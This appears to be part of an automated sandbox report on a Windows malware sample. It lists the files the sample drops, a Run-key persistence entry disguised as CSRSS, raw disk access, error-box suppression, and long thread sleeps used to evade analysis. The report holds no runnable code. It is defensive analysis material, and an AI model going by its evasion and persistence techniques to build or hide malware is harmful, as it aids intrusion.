                  Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\93D2.exe
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Temp\is-UA7KG.tmp\_isetup\_isdecmp.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\is-AQ5SU.tmp
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | File created: C:\Users\user\AppData\Local\Temp\nsfDE87.tmp
                  Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\afratej
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\is-30U3A.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\is-MN9TN.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\libvorbisenc-2.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\is-IGFK1.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\avformat-58.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\avutil-56.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\A6A0.exe | File created: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\is-37AOI.tmp
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exe | File created: C:\Users\user\AppData\Local\Temp\FourthX.exe
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Temp\is-UA7KG.tmp\_isetup\_iscrypt.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\libogg-0.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\is-AQ01D.tmp
                  Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\A6A0.exe
                  Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\8E91.exe
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\SDL2.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\A6A0.exe | File created: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | File created: C:\Users\user\AppData\Local\Temp\nsbD510.tmp\INetC.dll
                  Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\97EA.dll
                  Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\E33F.exe
                  Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\671C.exe
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\avcodec-58.dll (copy)
                  Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\vfratej
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Temp\is-UA7KG.tmp\_isetup\_shfoldr.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\is-TU931.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\swresample-3.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Temp\is-UA7KG.tmp\_isetup\_setup64.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\libvorbis-0.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\is-88CHK.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\is-RGLU2.tmp
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\syncUpd[1].exe
                  Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\8837.exe
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\libbz2-1.dll (copy)

                  Boot Survival

                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE0 | 10_2_00408951
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: CreateFileA,DeviceIoControl, PHYSICALDRIVE0 | 10_2_00408951
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE0 | 10_2_00408958
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: CreateFileA,DeviceIoControl, PHYSICALDRIVE0 | 10_2_00408958
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE0 | 10_2_0040895B
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: CreateFileA,DeviceIoControl, PHYSICALDRIVE0 | 10_2_0040895B
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE0 | 16_2_0040895B
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE0 | 16_2_0040895B
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE0 | 16_2_00408951
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE0 | 16_2_00408951
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE0 | 16_2_00408958
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE0 | 16_2_00408958
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSS

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\ccqgh1mkws.exe
                  Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\afratej:Zone.Identifier read attributes | delete
                  Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\vfratej:Zone.Identifier read attributes | delete
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                  Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\A6A0.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\A6A0.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmp | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\Drivers\csrss.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe; Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Roaming\afratej; Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Local\Temp\DC49.exe; Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Windows\SysWOW64\regsvr32.exe; Section loaded: \KnownDlls32\tESTAPp.ExE
                  Source: ccQGH1mKws.exe, 00000001.00000002.1549896209.000000000051E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: ASWHOOKK
                  Source: afratej, 00000006.00000002.1794010100.000000000071E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: ASWHOOK/5J
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exe; Memory allocated: 3690000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exe; Memory allocated: 38C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe; Thread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exe; Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\explorer.exe; Window / User API: threadDelayed 418
                  Source: C:\Windows\explorer.exe; Window / User API: threadDelayed 884
                  Source: C:\Windows\explorer.exe; Window / User API: threadDelayed 717
                  Source: C:\Windows\explorer.exe; Window / User API: threadDelayed 1873
                  Source: C:\Windows\explorer.exe; Window / User API: foregroundWindowGot 675
                  Source: C:\Windows\explorer.exe; Window / User API: foregroundWindowGot 676
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe; Window / User API: threadDelayed 4020
                  Source: C:\ProgramData\Drivers\csrss.exe; Window / User API: threadDelayed 6753
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe; Window / User API: threadDelayed 1299
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1674
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-30U3A.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-8B8M3.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\libwinpthread-1.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-MN9TN.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\libvorbisenc-2.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\zlib1.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-IGFK1.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\avformat-58.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\avutil-56.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-37AOI.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UA7KG.tmp\_isetup\_iscrypt.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-VTCPG.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\libogg-0.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-AQ01D.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\SDL2.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-ETRFM.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-NDO9R.tmp
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsbD510.tmp\INetC.dll
                  Source: C:\Windows\explorer.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\97EA.dll
                  Source: C:\Windows\explorer.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E33F.exe
                  Source: C:\Windows\explorer.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\671C.exe
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\avcodec-58.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-DCV21.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UA7KG.tmp\_isetup\_shfoldr.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\libgcc_s_dw2-1.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-TU931.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\swresample-3.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-7865G.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UA7KG.tmp\_isetup\_setup64.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\libiconv-2.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\unins000.exe (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\libvorbis-0.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UA7KG.tmp\_isetup\_isdecmp.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-88CHK.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-RGLU2.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-AQ5SU.tmp
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\syncUpd[1].exe
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsfDE87.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\libbz2-1.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe; Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep (graph_7-11449)
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe; Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_10-4426)
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe; API coverage: 9.7 %
                  Source: C:\Windows\explorer.exe TID: 1816; Thread sleep time: -88400s >= -30000s
                  Source: C:\Windows\explorer.exe TID: 2192; Thread sleep time: -71700s >= -30000s
                  Source: C:\Windows\explorer.exe TID: 1816; Thread sleep time: -187300s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe TID: 4464; Thread sleep time: -402000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe TID: 3920; Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe TID: 1824; Thread sleep time: -600000s >= -30000s
                  Source: C:\ProgramData\Drivers\csrss.exe TID: 5752; Thread sleep count: 6753 > 30
                  Source: C:\ProgramData\Drivers\csrss.exe TID: 5752; Thread sleep time: -675300s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exe TID: 520; Thread sleep time: -922337203685477s >= -30000s
